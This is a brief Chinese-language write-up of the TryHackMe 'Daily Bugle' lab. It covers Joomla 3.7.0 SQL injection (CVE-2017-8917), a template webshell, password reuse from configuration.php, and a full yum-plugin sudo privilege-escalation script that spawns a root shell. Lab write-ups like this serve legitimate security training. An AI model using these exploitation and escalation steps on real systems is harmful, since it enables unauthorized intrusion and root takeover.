DailyBugle|TryHackMe

DailyBugle|TryHackMe

What is the Joomla version?

1
2
3
msf6 > search joomla

14 auxiliary/scanner/http/joomla_version normal No Joomla Version Scanner

版本为3.7.0

searsploit joomla 3.7.0找到sqlmap的payload,太久了,提示Instead of using SQLMap, why not use a python script!

github找到Poc GitHub - Siopy/CVE-2017-8917: CVE-2017-8917 - Joomla 3.7.0 ‘com_fields’ SQL Injection

hashes.com反查

http://10.10.82.60/administrator登录

更改模板,加入一句话木马,msf菜刀连上

当前用户为apache,/home下找到用户jjameson

./configuration.php找到一个密码:nv5uz9r3ZEDzVjNu,成功登录

sudo -l看到yum有权限

yum | GTFOBins yum提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOF

然后执行sudo yum -c $TF/x --enableplugin=y

拿到root